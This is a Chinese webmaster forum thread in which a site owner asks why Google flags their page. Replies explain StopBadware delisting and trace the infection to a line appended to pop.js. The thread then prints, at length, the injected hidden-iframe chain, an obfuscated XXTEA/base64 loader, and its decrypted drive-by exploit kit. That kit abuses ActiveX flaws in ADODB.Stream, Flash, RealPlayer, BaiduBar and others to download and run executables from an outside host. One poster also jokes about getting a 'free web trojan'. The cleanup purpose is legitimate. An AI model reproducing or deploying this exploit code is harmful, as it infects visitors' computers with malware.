帮忙看下这一页那个地方有马
[url]http://www.topcpp.cn/gc/3050/index.html[/url]请指教
谷歌报马
很郁闷
俺菜鸟一个
多多指教
谢谢
:( :(
[[i] 本帖最后由 coreboy 于 2008-7-25 23:58 编辑 [/i]] 1、最可靠的办法是自查自纠,找到并清除所有可能的恶意代码、流氓软件、网页病毒,确保自已的网站不再有上述问题后。
2、然后向 [url=http://www.stopbadware.org/home/reviewinfo]http://www.stopbadware.org/home/reviewinfo[/url] 申请重新索引 ,一旦Stop Bad Ware联盟确认你的网站不再有网页病毒,Google不久也会取消该警告提示。
实际操作:
打开:[url=http://www.stopbadware.org/home/reviewinfo]http://www.stopbadware.org/home/reviewinfo[/url]
点击:
[url=http://www.stopbadware.org/home/reportsearch][color=#800080]Search for your site[/color][/url] in our Badware Website Clearinghouse
输入验证码,输入您网站的域名,搜索一下。如果有结果,就意味着您的网站在警告之列,如无结果,说明您的网站正常。
点击您的玉米,在页面上找到Click to Request Review 按钮或者 Ask StopBadware to review your site 链接点击
分别填上 您的名字 email
说名理由
"I've removed all badware and fixed the vulnerability that allowed it to be placed on my site";
"I've carefully checked my site and my ad providers and don't believe I am hosting or linking to badware";
"I distribute software on my site, but I don't think it is bad according to StopBadware's guidelines"; or other specific reasons
意思大概是:1我已经去除网站病毒;2,我已经去除病毒链接;3,网站有插件,但不是病毒。
然后提交,这时会收到一封邮件,大体意思是已经收到您的请求,将尽快处理。之后您要等的就是他们的处理结果的邮件了。一般48小时左右就有结果。如果他们确认没问题的话,那个警告也会去除的。
初步看了下,你的站还是有问题的,你再详细分析下你的代码看是否有链接到插件,恶意exe程序之类。
This page is StopBadware's information page about topcpp.cn/gc/.
Google has found that some portion of topcpp.cn/gc/ contains or links to badware or otherwise violates Google's software guidelines. 楼上回答很好呀,加分落伍了. 嗯
谢谢 我靠 是狗狗啊 前些日子就中这个了
我给你查查 ======= 病毒文件在[url]http://www.topcpp.cn/template/bluemonster/images[/url]/pop.js
怕你误点我把斜杠换了
病毒代码在最后一行
<script src=\"http://uni%6Fn1860.cn\"><\/script>
追溯木马来源
document.writeln("<base onmouseover=\"window.status=\'完毕 \';return true\">");
var seraph;
if (seraph==null)
{
seraph=1;
document.write("<iframe src=http://www.lwieuro.cn/60.htm width=100 height=0></iframe>");
}
我们继续
<iframe src=timwp.html width=100 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/2024560.js"></script>
我们再继续
汗。。还用51啦做统计分析。。这人。。。
我们go on~
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
<!-- START AIYA Site Stat. -->
window.defaultStatus="完成";
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String["fromCharCode"](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String["fromCharCode"](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="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";
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
/*Extreme*/
</SCRIPT>
我一会解密看下 呵呵 ---------------------------
解密后代码
---------------------------
try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/www.tw360.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9");}
catch(f){};
finally{if(f!="[object Error]"){
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain">');
document.write('<param name="movie" value="http://www.tw360.net/versionie.swf">');
document.write('<param name="quality" value="high">');
document.write('<param name="bgcolor" value="#ffffff">');
document.write('<embed src="http://www.tw360.net/versionie.swf">');
document.write('</object>');
}else{document.write("<EMBED src=http://www.tw360.net/versionff.swf width=0 height=0>")}}}
try{var g;
var storm=new ActiveXObject("\x55\x55\x55\x50\x47\x52\x41\x44\x45\x2e\x55\x55\x55\x70\x67\x72\x61\x64\x65\x43\x74\x72\x6c\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
var url="http://www.tw360.net/";
storm=(document.createElement("\x6f\x62\x6a\x65\x63\x74"));
ActivePerl="\x2d\x31\x43\x35\x39\x2d\x34\x42\x42\x42\x2d\x38\x45\x38";
getSpraySlide="\x31\x2d\x36\x45\x38\x33\x46\x38\x32\x43\x38\x31\x33\x42";
helloworld2Address="\x63\x6c\x73\x69\x64\x3a\x32\x43\x41\x43\x44\x37\x42\x42";
storm.setAttribute("\x63\x6c\x61\x73\x73\x69\x64",helloworld2Address+ActivePerl+getSpraySlide)
storm["\x55\x70\x64\x61\x74\x65"]("\\Program Files\\Common Files\\uusee\\" ,url+"\x55\x55\x2e\x69\x6e\x69","",1)}}
try{var h;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src="http://www.tw360.net/GLWORLD.html"></iframe>')}}
try{var i;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(i){};
finally{if(i!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/www.tw360.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://www.tw360.net/Real.html"></iframe>')}}}
try{var j;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(j){};
finally{if(j!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://www.tw360.net/Baidu.cab", "Baidu.exe", 0)}}
if(g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("QvodInsert.QvodCtrl.1"))document.write('<iframe width=100 height=0 src=http://www.tw360.net/Qvod.html></iframe>')}catch(e){}
}}}
---------------------------
确定
还没完 go继续
--------------------------- ok 搞定了 后面的跟这一样顺着这个思路继续 我弄完了最后文件是orz.exe
嘿嘿 免费的网马到手喽 不过还是不免杀 不爽啊 高手啊 真系高手!我睇到头晕还没看出个所然来 强悍的高手!! 我改后
怎么没法播放啦
呜呜
不显示播放列表啦 我给你看下 一会回复你 你别把那个js去掉啊 你只需要把pop.js最后一行删除即可这个js你还得加回到代码里的 哦
这样啊
谢谢
我试试看 freemylove小帅锅居然加分了 嫉妒 路过路过。..中马很麻烦 呵呵 *** 作者被禁止或删除 内容自动屏蔽 *** 全站挂马
害的我被谷歌惩罚
呜呜 晕死啦
不知道那个无耻之人
我昨天刚改好
它今天有放上去啦
吓人啊
我目录什么的都改啦还是不行
居然还挂
欺负我啊
页:
[1]
2